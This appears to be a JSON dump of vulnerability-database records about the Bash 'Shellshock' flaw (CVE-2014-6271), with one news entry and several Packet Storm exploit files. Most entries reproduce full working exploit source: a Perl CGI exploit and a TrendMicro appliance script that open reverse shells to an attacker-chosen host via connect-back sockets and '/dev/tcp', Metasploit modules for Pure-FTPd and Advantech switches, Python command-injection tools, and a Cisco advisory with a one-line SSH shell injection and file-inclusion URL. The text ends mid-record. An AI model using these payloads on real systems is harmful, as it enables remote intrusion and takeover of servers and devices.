vulnerable to the threat.\n", "cvss3": {}, "published": "2014-10-01T14:43:47", "type": "threatpost", "title": "VMware Begins to Patch Bash Issues Across Product Line", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2014-10-01T18:43:47", "id": "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848", "href": 
"https://threatpost.com/vmware-begins-to-patch-bash-issues-across-product-line/108632/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:41", "description": "", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI REFERER Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-26T00:00:00", "id": "PACKETSTORM:128443", "href": "https://packetstormsecurity.com/files/128443/Gnu-Bash-4.3-CGI-REFERER-Command-Injection.html", "sourceData": "`#!/usr/bin/perl \n# \n# Title: Bash/cgi command execution exploit \n# CVE: CVE-2014-6271 \n# Author: Simo Ben youssef \n# Contact: Simo_at_Morxploit_com \n# Coded: 25 September 2014 \n# Published: 26 September 2014 \n# MorXploit Research \n# http://www.MorXploit.com \n# \n# Description: \n# Perl code to exploit CVE-2014-6271. \n# Injects a Perl connect back shell. \n# \n# Download: \n# http://www.morxploit.com/morxploits/morxbash.pl \n# \n# Requires LWP::UserAgent \n# apt-get install libwww-perl \n# yum install libwww-perl \n# perl -MCPAN -e 'install Bundle::LWP' \n# For SSL support: \n# apt-get install liblwp-protocol-https-perl \n# yum install perl-Crypt-SSLeay \n# \n# Tested on: \n# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu) \n# \n# Demo: \n# perl morxbash.pl http://localhost cgi-bin/test.cgi 127.0.0.1 1111 \n# \n# =================================================== \n# --- Bash/cgi remote command execution exploit \n# --- By: Simo Ben youssef <simo_at_morxploit_com> \n# --- MorXploit Research www.MorXploit.com \n# =================================================== \n# [*] MorXploiting http://localhost/cgi-bin/test.cgi \n# [+] Sent payload! Waiting for connect back shell ... \n# [+] Et voila you are in! 
\n# \n# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux \n# uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# \n# Author disclaimer: \n# The information contained in this entire document is for educational, demonstration and testing purposes only. \n# Author cannot be held responsible for any malicious use or dammage. Use at your own risk. \n# \n \nuse LWP::UserAgent; \nuse IO::Socket; \nuse strict; \n \nsub banner { \nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear'); \nprint \"===================================================\\n\"; \nprint \"--- Bash/cgi remote command execution exploit\\n\"; \nprint \"--- By: Simo Ben youssef <simo_at_morxploit_com>\\n\"; \nprint \"--- MorXploit Research www.MorXploit.com\\n\"; \nprint \"===================================================\\n\"; \n} \n \nif (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3])) { \nbanner(); \nprint \"perl $0 <target> <cgi script path> <connectbackIP> <connectbackport>\\n\"; \nprint \"perl $0 http://localhost cgi-bin/test.cgi 127.0.0.1 31337\\n\"; \nexit; \n} \n \nmy $host = $ARGV[0]; \nmy $dir = $ARGV[1]; \nmy $cbhost = $ARGV[2]; \nmy $cbport = $ARGV[3]; \nmy $other = \"http://localhost:81\"; \n$| = 1; \n$SIG{CHLD} = 'IGNORE'; \n \nmy $l_sock = IO::Socket::INET->new( \nProto => \"tcp\", \nLocalPort => \"$cbport\", \nListen => 1, \nLocalAddr => \"0.0.0.0\", \nReuse => 1, \n) or die \"[-] Could not listen on $cbport: $!\\n\"; \n \nsub randomagent { \nmy @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', \n'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \n'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', \n'Mozilla/5.0 (X11; 
Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' \n); \nmy $random = $array[rand @array]; \nreturn($random); \n} \nmy $useragent = randomagent(); \n \nmy $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); \n$ua->timeout(10); \n$ua->agent($useragent); \nmy $status = $ua->get(\"$host/$dir\"); \nunless ($status->is_success) { \nbanner(); \nprint \"[-] Error: \" . $status->status_line . \"\\n\"; \nexit; \n} \n \nbanner(); \nprint \"[*] MorXploiting $host/$dir\\n\"; \n \nmy $payload = \"() { :; }; /bin/bash -c \\\"perl -e '\\\\\\$p=fork;exit,if(\\\\\\$p); use Socket; use FileHandle; my \\\\\\$system = \\\\\\\"/bin/sh\\\\\\\"; my \\\\\\$host = \\\\\\\"$cbhost\\\\\\\"; my \\\\\\$port = \\\\\\\"$cbport\\\\\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\\\\\"tcp\\\\\\\")); connect(SOCKET, sockaddr_in(\\\\\\$port, inet_aton(\\\\\\$host))); SOCKET->autoflush(); open(STDIN, \\\\\\\">&SOCKET\\\\\\\"); open(STDOUT,\\\\\\\">&SOCKET\\\\\\\"); open(STDERR,\\\\\\\">&SOCKET\\\\\\\"); print \\\\\\\"[+] Et voila you are in!\\\\\\\\n\\\\\\\\n\\\\\\\"; system(\\\\\\\"uname -a;id\\\\\\\"); system(\\\\\\$system);'\\\"\"; \nmy $exploit = $ua->get(\"$host/$dir\", Referer => \"$payload\"); \nprint \"[+] Sent payload! Waiting for connect back shell ...\\n\"; \nmy $a_sock = $l_sock->accept(); \n$l_sock->shutdown(SHUT_RDWR); \ncopy_data_bidi($a_sock); \n \nsub copy_data_bidi { \nmy ($socket) = @_; \nmy $child_pid = fork(); \nif (! 
$child_pid) { \nclose(STDIN); \ncopy_data_mono($socket, *STDOUT); \n$socket->shutdown(SHUT_RD); \nexit(); \n} else { \nclose(STDOUT); \ncopy_data_mono(*STDIN, $socket); \n$socket->shutdown(SHUT_WR); \nkill(\"TERM\", $child_pid); \n} \n} \nsub copy_data_mono { \nmy ($src, $dst) = @_; \nmy $buf; \nwhile (my $read_len = sysread($src, $buf, 4096)) { \nmy $write_len = $read_len; \nwhile ($write_len) { \nmy $written_len = syswrite($dst, $buf); \nreturn unless $written_len; \n$write_len -= $written_len; \n} \n} \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128443/morxbash.pl.txt"}, {"lastseen": "2016-12-05T22:18:53", "description": "", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI Scan Remote Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-26T00:00:00", "id": "PACKETSTORM:128442", "href": "https://packetstormsecurity.com/files/128442/Gnu-Bash-4.3-CGI-Scan-Remote-Command-Injection.html", "sourceData": "`#!/usr/bin/env python \n \n# http connection \nimport urllib2 \n# Args management \nimport optparse \n# Error managemen \nimport sys \n \nbanner = \"\"\" \n_______ _______ __ \n| _ .-----.--.--. | _ .---.-.-----| |--. \n|. |___| | | | |. 1 | _ |__ --| | \n|. | |__|__|_____| |. _ |___._|_____|__|__| \n|: 1 | |: 1 \\ \n|::.. . | |::.. . / \n`-------' `-------' \n___ ___ _______ _______ _______ ___ \n| Y | | _ | | _ | _ | | \n| | |_|___| | |. l |. 1___|. | \n|____ |___(__ | |. _ |. |___|. | \n|: | |: 1 | |: | |: 1 |: | \n|::.| |::.. . | |::.|:. |::.. . 
|::.| \n`---' `-------' `--- ---`-------`---' \n \nGnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n \n \n========================================== \n- Release date: 2014-09-25 \n- Discovered by: Stephane Chazelas \n- CVE: 2014-6271 \n=========================================== \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n\"\"\" \n \n# Check url \ndef checkurl(url): \nif url[:8] != \"https://\" and url[:7] != \"http://\": \nprint('[X] You must insert http:// or https:// procotol') \nsys.exit(1) \nelse: \nreturn url \n \ndef connectionScan(url): \nprint '[+] Checking for vulnerability...' \ntry: \nheaders = {\"VULN\" : \"() { :;}; echo 'H0m3l4b1t: YES'\"} \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response) \nif 'H0m3l4b1t' in content.info(): \nprint '[!] VULNERABLE: '+url \nelse: \nprint '[X] NOT Vulnerable' \nexcept urllib2.HTTPError, e: \nprint e.info() \nif e.code == 400: \nprint '[X] Page not found' \nelse: \nprint '[X] HTTP Error' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ndef connectionInje(url,cmd): \ntry: \nheaders = { 'User-Agent' : '() { :;}; /bin/bash -c \"'+cmd+'\"' } \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response).read() \nprint '[!] '+cmd+' command sent!' \nexcept urllib2.HTTPError, e: \nif e.code == 500: \nprint '[!] '+cmd+' command sent!!!' \nelse: \nprint '[!] 
command not sent :(' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ncommandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c \"touch /tmp/test.txt\"') \ncommandList.add_option('-t', '--target', action=\"store\", \nhelp=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", \n) \ncommandList.add_option('-c', '--cmd', action=\"store\", \nhelp=\"Insert command name\", \n) \ncommandList.add_option('-s', '--scan', default=False, action=\"store_true\", \nhelp=\"Scan Only\", \n) \noptions, remainder = commandList.parse_args() \n \n# Check args \nif not options.target: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \nelif options.target and not options.cmd and not options.scan: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \n \nprint(banner) \n \nurl = checkurl(options.target) \ncmd = options.cmd \nif options.scan: \nprint '[+] Scan Only Mode' \nconnectionScan(url) \nelse: \nprint '[+] Remote Command Innection Mode' \nconnectionScan(url) \nconnectionInje(url,cmd) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128442/gnu_b4sh_43_rci_v2.py.txt"}, {"lastseen": "2016-12-05T22:20:10", "description": "", "cvss3": {}, "published": "2014-10-02T00:00:00", "type": "packetstorm", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-10-02T00:00:00", "id": "PACKETSTORM:128522", "href": "https://packetstormsecurity.com/files/128522/Pure-FTPd-External-Authentication-Bash-Environment-Variable-Code-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude 
Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', \n'Description' => %q( \nThis module exploits the code injection flaw known as shellshock which \nleverages specially crafted environment variables in Bash. This exploit \nspecifically targets Pure-FTPd when configured to use an external \nprogram for authentication. \n), \n'Author' => \n[ \n'Stephane Chazelas', # Vulnerability discovery \n'Frank Denis', # Discovery of Pure-FTPd attack vector \n'Spencer McIntyre' # Metasploit module \n], \n'References' => \n[ \n['CVE', '2014-6271'], \n['OSVDB', '112004'], \n['EDB', '34765'], \n['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] \n], \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 2048 \n}, \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'CmdStagerFlavor' => :printf \n} \n], \n[ 'Linux x86_64', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_X86_64, \n'CmdStagerFlavor' => :printf \n} \n] \n], \n'DefaultOptions' => \n{ \n'PrependFork' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 24 2014')) \nregister_options( \n[ \nOpt::RPORT(21), \nOptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) \n], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \nend \n \ndef check \n# this check method tries to use the vulnerability to bypass the login \nusername = rand_text_alphanumeric(rand(20) + 1) \nrandom_id = (rand(100) + 1) \ncommand = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\" \nif send_command(username, command) =~ /^2\\d\\d ok./i \nreturn CheckCode::Safe if banner !~ /pure-ftpd/i \ndisconnect \n \ncommand = \"echo auth_ok:0; echo end\" \nif send_command(username, command) =~ /^5\\d\\d login authentication failed/i \nreturn CheckCode::Vulnerable \nend \nend 
\ndisconnect \n \nCheckCode::Safe \nend \n \ndef execute_command(cmd, _opts) \ncmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\") \nusername = rand_text_alphanumeric(rand(20) + 1) \nsend_command(username, cmd) \nend \n \ndef exploit \n# Cannot use generic/shell_reverse_tcp inside an elf \n# Checking before proceeds \nif generate_payload_exe.blank? \nfail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\") \nend \n \nexecute_cmdstager(linemax: 500) \nhandler \nend \n \ndef send_command(username, cmd) \ncmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\" \nconnect \nsend_user(username) \npassword_result = send_pass(cmd) \ndisconnect \npassword_result \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128522/pureftpd_bash_env_exec.rb.txt"}, {"lastseen": "2018-12-08T02:36:14", "description": "", "cvss3": {}, "published": "2018-12-07T00:00:00", "type": "packetstorm", "title": "FutureNet NXR-G240 Series ShellShock Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2018-12-07T00:00:00", "id": "PACKETSTORM:150687", "href": "https://packetstormsecurity.com/files/150687/FutureNet-NXR-G240-Series-ShellShock-Command-Injection.html", "sourceData": "`# -*- coding: utf-8 -*- \n# Title: FutureNet NXR-G240 Series - \"ShellShock\" Remote Command Injection \n# Date: 2018-06-12 \n# Author: Nassim Asrir \n# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/ \n# Vendor: http://www.centurysys.co.jp/ \n# CVE: CVE-2014-6271 \n# Greetz to : Nadia BENCHIKHA for the great help. 
\n# Example: \n# [root@parrot]a[/home/sniperpex/Desktop] \n# #python ./exploit.py http://server -u admin -p admin -c ps \n \nimport urllib2 \nimport base64 \nimport bs4 \nimport sys \nimport argparse \nreload(sys) \nsys.setdefaultencoding('utf8') \n \nap = argparse.ArgumentParser(description=\"FutureNet NXR-G240 Series - ShellShock Remote Command Injection \") \n \nap.add_argument(\"host\", help=\"(Example: http://127.0.0.1).\") \n \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin)\") \n \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin)\") \n \nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\") \n \nargs = ap.parse_args() \n \nrequest = urllib2.Request(args.host+\"/cgi-bin/information.cgi?section=arp&module=system&command=execute\") \n \nbase64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\\n', '') \n \nprint '[+] Authentication & Exploit in progress...' \n \nrequest.add_header(\"Authorization\", \"Basic %s\" % base64string) \n \nrequest.add_header(\"User-Agent\", \"() { :;}; /bin/bash -c \"+str(args.cmd)) \n \nresponse = urllib2.urlopen(request) \n \nsoup = bs4.BeautifulSoup(response, 'html.parser') \n \nfor textarea in soup.find_all('pre'): \n \nprint textarea.get_text().replace(\"# ARPaea +-\",'').replace(\"e!\"c$?oaSSaa3/4aa\",'') \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150687/futurenetnxrg240-exec.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "cvss3": {}, "published": "2015-08-13T00:00:00", "type": "packetstorm", "title": "Cisco Unified Communications Manager Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2015-08-13T00:00:00", "id": "PACKETSTORM:133070", "href": 
"https://packetstormsecurity.com/files/133070/Cisco-Unified-Communications-Manager-Command-Execution.html", "sourceData": "`Vantage Point Security Advisory 2015-001 \n======================================== \n \nTitle: Cisco Unified Communications Manager Multiple Vulnerabilities \nVendor: Cisco \nVendor URL: http://www.cisco.com/ \nVersions affected: <9.2, <10.5.2, <11.0.1. \nSeverity: Low to medium \nVendor notified: Yes \nReported: Oct. 2014 \nPublic release: Aug. 13th, 2015 \nAuthor: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> \n \nSummary: \n-------- \n \nCisco Unified Communications Manager (CUCM) offers services such as session \nmanagement, voice, video, messaging, mobility, and web conferencing. \n \nDuring the last year, Vantage Point Security has reported four security \nissues to Cisco as listed below. \n \n \n1. Shellshock command injection \n-------------------------------- \n \nAuthenticated users of CUCM can access limited functionality via the web \ninterface and Cisco console (SSH on port 22). Because the SSH server is \nconfigured to process several environment variables from the client and a \nvulnerable version of bash is used, it is possible to exploit command \ninjection via specially crafted environment variables (CVE-2014-6271 a.k.a. \nshellshock). This allows an attacker to spawn a shell running as the user \n\"admin\". \n \n \nSeveral environment variables can be used to exploit the issue. Example: \n \n \n$ LC_PAPER=\"() { x;};/bin/sh\" ssh Administrator@examplecucm.com \n \n \n2. Local File Inclusion \n----------------------- \n \nThe application allows users to view the contents of any locally accessible \nfiles on the web server through a vulnerability known as LFI (Local File \nInclusion). LFI vulnerabilities are commonly used to download application \nsource code, configuration files and files containing sensitive information \nsuch as passwords. Exploiting this issue requires a valid user account. 
\n \n \nhttps://cucm.example.com/:8443/reporter-servlet/GetFileContent?Location=/&FileName=/usr/local/thirdparty/jakarta-tomcat/conf/tomcat-users.xml \n \n \n3. Unauthenticated access to ping command \n----------------------------------------- \n \nThe pingExecute servlet allows unauthenticated users to execute pings to \narbitrary IP addresses. This could be used by an attacker to enumerate the \ninternal network. The following URL triggers a ping of the host 10.0.0.1: \n \nhttps://cucm.example.com:8443/cmplatform/pingExecute?hostname=10.0.0.1&interval=1.0&packetsize=12&count=1000&secure=false \n \n \n4. Magic session ID allows unauthenticated access to SOAP calls \n--------------------------------------------------------------- \n \nAuthentication for some methods in the EPAS SOAP interface can be bypassed \nby using a hardcoded session ID. The methods \"GetUserLoginInfoHandler\" and \n\"GetLoggedinXMPPUserHandler\" are affected. \n \n \nFix Information: \n---------------- \n \nUpgrade to CUCM version 9.2, 10.5.2 or 11.0.1. \n \n \nReferences: \n----------- \n \nhttps://tools.cisco.com/quickview/bug/CSCus88031 \nhttps://tools.cisco.com/quickview/bug/CSCur49414 \nhttps://tools.cisco.com/quickview/bug/CSCum05290 \nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash \nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=37111 \n \n \nTimeline: \n--------- \n \n2014/10: Issues reported to Cisco; \n2015/07: Confirm that all issues have been fixed. \n \n \nAbout Vantage Point Security: \n-------------------- \n \nVantage Point is the leading provider for penetration testing and security \nadvisory services in Singapore. Clients in the Financial, Banking and \nTelecommunications industries select Vantage Point Security based on \ntechnical competency and a proven track record to deliver significant and \nmeasurable improvements in their security posture. 
\n \nhttps://www.vantagepoint.sg/ \noffice[at]vantagepoint[dot]sg \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133070/cisco-lfiexec.txt"}, {"lastseen": "2016-12-05T22:22:36", "description": "", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "packetstorm", "title": "Advantech Switch Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2015-12-02T00:00:00", "id": "PACKETSTORM:134594", "href": "https://packetstormsecurity.com/files/134594/Advantech-Switch-Bash-Environment-Variable-Code-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)', \n'Description' => %q{ \nThis module exploits the Shellshock vulnerability, a flaw in how the Bash shell \nhandles external environment variables. This module targets the 'ping.sh' CGI \nscript, acessible through the Boa web server on Advantech switches. This module \nwas tested against firmware version 1322_D1.98. 
\n}, \n'Author' => 'hdm', \n'References' => [ \n['CVE', '2014-6271'], \n['CWE', '94'], \n['OSVDB', '112004'], \n['EDB', '34765'], \n['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'], \n['URL', 'https://access.redhat.com/articles/1200223'], \n['URL', 'http://seclists.org/oss-sec/2014/q3/649'] \n], \n'Privileged' => false, \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x0A\\x0D\", \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'openssl generic' \n} \n}, \n'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], \n'DefaultTarget' => 0, \n'License' => MSF_LICENSE, \n'DisclosureDate' => 'Dec 01 2015' \n)) \nregister_options([ \nOpt::RPORT(80) \n], self.class) \nend \n \n# \n# CVE-2014-6271 \n# \ndef cve_2014_6271(cmd) \n%{() { :;}; $(#{cmd}) & } \nend \n \n# \n# Check credentials \n# \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/cgi-bin/ping.sh' \n) \nif !res \nvprint_error(\"#{peer} - No response from host\") \nreturn Exploit::CheckCode::Unknown \nelsif res.headers['Server'] =~ /Boa\\/(.*)/ \nvprint_status(\"#{peer} - Found Boa version #{$1}\") \nelse \nprint_status(\"#{peer} - Target is not a Boa web server\") \nreturn Exploit::CheckCode::Safe \nend \n \nif res.body.to_s.index('127.0.0.1 ping statistics') \nreturn Exploit::CheckCode::Detected \nelse \nvprint_error(\"#{peer} - Target does not appear to be an Advantech switch\") \nreturn Expoit::CheckCode::Safe \nend \nend \n \n# \n# Exploit \n# \ndef exploit \ncmd = cve_2014_6271(payload.encoded) \nvprint_status(\"#{peer} - Trying to run command '#{cmd}'\") \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/cgi-bin/ping.sh', \n'agent' => cmd \n) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/134594/advantech_switch_bash_env_exec.rb.txt"}, {"lastseen": "2016-12-05T22:13:54", "description": "", "cvss3": {}, "published": "2016-10-22T00:00:00", "type": "packetstorm", "title": "TrendMicro InterScan Web Security Virtual Appliance Shellshock", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2016-10-22T00:00:00", "id": "PACKETSTORM:139304", "href": "https://packetstormsecurity.com/files/139304/TrendMicro-InterScan-Web-Security-Virtual-Appliance-Shellshock.html", "sourceData": "`#!/usr/bin/env python \n# TrendMicro InterScan Web Security Virtul Appliance \n# ================================================== \n# InterScan Web Security is a software virtual appliance that \n# dynamically protects against the ever-growing flood of web \n# threats at the Internet gateway exclusively designed to secure \n# you against traditional and emerging web threats at the Internet \n# gateway. The appliance however is shipped with a vulnerable \n# version of Bash susceptible to shellshock (I know right?). An \n# attacker can exploit this vulnerability by calling the CGI \n# shellscript \"/cgi-bin/cgiCmdNotify\" which can be exploited \n# to perform arbitrary code execution. A limitation of this \n# vulnerability is that the attacker must have credentials for \n# the admin web interface to exploit this flaw. The panel runs \n# over HTTP by default so a man-in-the-middle attack could be \n# used to gain credentials and compromise the appliance. \n# \n# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1 \n# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit \n# [-] Authenticating to '192.168.56.101' with 'admin' 'password' \n# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA \n# [-] exploiting shellshock CVE-2014-6271... 
\n# bash: no job control in this shell \n# bash-4.1$ id \n# uid=498(iscan) gid=499(iscan) groups=499(iscan) \n# \n# -- Hacker Fantastic \n# \n# (https://www.myhackerhouse.com) \nimport SimpleHTTPServer \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_listener(): \nos.system(\"nc -l 8080\") \n \ndef shellshock(ip,session,cbip): \nuser_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'} \ncookies = {'JSESSIONID': session} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"http://\"+ip+\":1812/cgi-bin/cgiCmdNotify\", headers = user_agent, cookies = cookies) \n \ndef login_http(ip,user,password): \nmydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'} \nprint \"[-] Authenticating to '%s' with '%s' '%s'\" % (ip,user,password) \nmyreq = requests.post(\"http://\"+ip+\":1812/uilogonsubmit.jsp\", data=mydata) \nsession_cookie = myreq.history[0].cookies.get('JSESSIONID') \nprint \"[-] JSESSIONID = %s\" % session_cookie \nreturn session_cookie \n \nif __name__ == \"__main__\": \nprint \"[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit\" \nif len(sys.argv) < 5: \nprint \"[-] use with <ip> <user> <pass> <connectback_ip>\" \nsys.exit() \nnewRef=os.fork() \nif newRef==0: \nspawn_listener() \nelse: \nsession = login_http(sys.argv[1],sys.argv[2],sys.argv[3]) \nshellshock(sys.argv[1],session,sys.argv[4]) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139304/trendmicro_IWSVA_shellshock.py.txt"}, {"lastseen": "2016-12-20T02:03:32", "description": "", "cvss3": {}, "published": "2016-12-19T00:00:00", "type": "packetstorm", "title": "RSSMON / BEAM (Red Star OS 3.0) Shellshock", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2016-12-19T00:00:00", "id": "PACKETSTORM:140205", "href": 
"https://packetstormsecurity.com/files/140205/RSSMON-BEAM-Red-Star-OS-3.0-Shellshock.html", "sourceData": "`#!/usr/bin/env python \n# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# ======================================================== \n# BEAM & RSSMON are Webmin based configuration utilities \n# that ship with RSS server 3.0. These packages are the \n# recommended GUI configuration components and listen on \n# a user specified port from 10000/tcp to 65535/tcp. They \n# are accessible on the local host only in vanilla install \n# unless the firewall is disabled. Both services run with \n# full root permissions and can be exploited for LPE or \n# network attacks. RSSMON has hardened SELinux policies \n# applied which hinder exploitation of this vulnerability \n# be limiting access to network resources. Commands are \n# still run as root in a blind way. \n# \n# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080 \n# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit \n# [-] exploiting shellshock CVE-2014-6271... 
